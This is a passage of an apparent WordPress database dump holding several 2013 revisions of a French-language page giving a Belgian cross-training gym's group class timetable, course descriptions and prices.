class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:37:45', '2013-10-05 08:37:45', '', 11, 'http://www.crosstrainingcenter.be/11-revision-116/', 0, 'revision', '', 0),
(349, 1, '2013-10-05 08:49:46', '2013-10-05 08:49:46', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:49:46', '2013-10-05 08:49:46', '', 11, 'http://www.crosstrainingcenter.be/11-revision-120/', 0, 'revision', '', 0),
(351, 1, '2013-10-05 08:51:38', '2013-10-05 08:51:38', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:51:38', '2013-10-05 08:51:38', '', 11, 'http://www.crosstrainingcenter.be/11-revision-122/', 0, 'revision', '', 0),
(348, 1, '2013-10-05 08:48:06', '2013-10-05 08:48:06', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"tcellule\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>19h</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"tcellule\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:48:06', '2013-10-05 08:48:06', '', 11, 'http://www.crosstrainingcenter.be/11-revision-119/', 0, 'revision', '', 0),
(347, 1, '2013-10-05 08:40:45', '2013-10-05 08:40:45', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"tcellule\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>17h30</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>17h30</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"tcellule\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>19h</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"tcellule\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td 